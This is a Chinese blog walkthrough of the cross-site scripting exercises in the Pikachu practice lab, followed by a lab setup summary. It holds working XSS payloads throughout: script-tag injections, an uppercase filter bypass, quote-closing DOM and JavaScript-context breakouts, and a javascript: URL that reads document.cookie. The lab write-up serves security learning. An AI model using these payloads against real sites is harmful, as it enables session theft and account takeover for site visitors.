【Pikachu】Cross-Site Scripting

image-20230815221214655

反射型xss(get)

image-20230812143856462

<script>alert("123")</script>

修改maxlength的值

image-20230812143947435

image-20230812143956083

反射型xss(post)

账号admin密码123456直接登录

<script>alert('xss')</script>

image-20230812150211238

image-20230812150216602

存储型xss

在留言板里直接<script>alert('xss')</script>

image-20230812150255251

出现xss的弹框后,点击确定,发现有个删除,说明确实是存到数据库里了

image-20230812150403215

查看数据库又没有这一条数据

image-20230812150651668

再次在留言板里输入js代码<script>alert('zs6666')</script>

image-20230812150736541

再次查看数据库

image-20230812150749514

这就是存储型反射型永久性和一次性的区别,会永久的存储在数据库中。

DOM型xss

javascript语言中分两种BOMDOM

BOM:浏览器对象模型 Brower Object Model
	js代码操作浏览器
DOM:文档对象模型  Document Object Model
	js代码操作标签

查看网页源代码,ctrl+f查找what do you see? 的位置

image-20230812151517365

发现源码中已经给出了xss代码


输入框中的内容就是标注的str,我们可以在这里构造一个闭合,实现弹窗

<a href='"+str+"'>what do you see?</a>

在输入框中输入' onclick="alert('xss')">,点击click me,出现what do you see?点击

image-20230812151847732

DOM型xss-x

image-20230812152427993

输入框里输入1,发现url发生了变化

image-20230812152449376

这次是从url中获取我们输入的text参数的,这就类似反射型,构造闭合即可。' onclick="alert('xss')">

image-20230812152721741

xss-盲打

将留言保存至后台 当管理员登录查看留言时就会触发

在页面中两个输入框中都输入<script>alert("123")</script>,提交后没有反应

查看数据库:

image-20230812153056263

也可以点一下提示,让去后台看看

http://127.0.0.1/pikachu/vul/xss/xssblind/admin.php

image-20230812153122947

发现登录后台,就会弹框

image-20230812154100666

xss-过滤

不知道过滤了什么 双写,提交后没反应

<sc<script>ript>alert("123")</script>

换成大写后成功

<SCRIPT>alert('xss')</SCRIPT>

xss之htmlspecialchars

specialchars函数就是把单引号,双引号,尖括号过滤了,但是这个函数默认是不过滤单引号的

javascript:alert(1)

xss之href输出

href 属性的值可以是任何有效文档的相对或绝对 URL,包括片段标识符和 JavaScript 代码段。如果用户选择了<a>标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。

javascript:alert(document.cookie)
javascript:alert(1)

xss之js输出

image-20230812161216819

先输入tmac

在这里插入图片描述

可以提前闭合</script>

</script><script>alert(1)</script>

也可以' ; alert(1); //

页面接受到的就是$ms=''; alert(1);//'

第一步: $ms=‘’’

第二步: $ms=‘’;’ 加分号,表示语句结束

第三步: $ms=‘’; alert(1);’ 弹框

第四步: $ms=‘’; alert(1); //’ 把//后面的那对引号 注释掉

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
pikachu-master是一个带有漏洞的Web应用系统,可以用于进行web安全漏洞的练习和学习。你可以从GitHub上下载pikachu-master的源码,并将其上传到你的Web服务器的根目录下。然后,你可以通过访问服务器的IP地址加上pikachu-master的路径来访问这个靶场,例如http://192.168.132.131/pikachu-master/。在安装和配置pikachu-master时,你需要确保Apache和MySQL服务开启,并将pikachu-master文件夹放置在xampp安装目录的htdocs文件夹下,并将config.inc.php文件中的数据库连接信息修改为你实际的数据库连接信息。在安装和配置完成后,你可以通过127.0.0.1/pikachu-master路径来访问这个靶场。在访问之前,你可以通过phpmyadmin来修改数据库账号和密码。请注意,解压pikachu-master文件时会生成两个文件夹,所以路径是127.0.0.1/pikachu-master/pikachu-master。pikachu-master提供了综合类型的靶场练习环境,涵盖了多种漏洞,适合进一步加强你的知识和技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Linux--linux部署pikachu靶场-kali-部署靶场(详细讲解)](https://blog.csdn.net/qq_56664029/article/details/129888616)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [pikachu实验靶场环境部署](https://blog.csdn.net/qq_40731934/article/details/130676513)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [pikachu-master.zip](https://download.csdn.net/download/BROTHERYY/12550852)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值